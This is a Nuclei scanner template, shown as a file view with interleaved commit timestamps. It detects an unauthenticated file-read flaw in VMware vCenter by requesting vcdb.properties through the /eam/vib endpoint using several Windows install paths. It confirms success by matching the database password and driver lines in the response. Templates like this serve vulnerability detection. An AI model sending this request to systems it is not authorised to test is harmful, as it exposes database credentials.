nuclei-templates/vulnerabilities/vmware/vmware-vcenter-lfi.yaml

34 lines
965 B
YAML
Raw Normal View History

id: vmware-vcenter-lfi
info:
name: VMware vCenter Unauthenticated Arbitrary File Read
author: dwisiswant0
severity: high
reference:
2021-04-29 06:12:56 +00:00
- https://kb.vmware.com/s/article/7960893
- https://twitter.com/ptswarm/status/1316016337550938122
tags: vmware,lfi
2020-10-13 16:02:26 +00:00
requests:
- raw:
- |
GET /eam/vib?id=§path§\vcdb.properties HTTP/1.1
Host: {{Hostname}}
payloads:
2020-10-13 14:55:29 +00:00
path:
- "C:\\ProgramData\\VMware\\VMware+VirtualCenter" # vCenter Server 5.5 and earlier (Windows 2008)
- "C:\\Documents+and+Settings\\All+Users\\Application+Data\\VMware\\VMware+VirtualCenter" # Other Windows versions
- "C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx" # vCenter Server => 6.0
attack: sniper
matchers-condition: and
matchers:
- type: regex
regex:
2020-10-13 15:51:29 +00:00
- "(?m)^(driver|dbtype|password(\\.encrypted)?)\\s="
part: body
- type: status
status:
- 200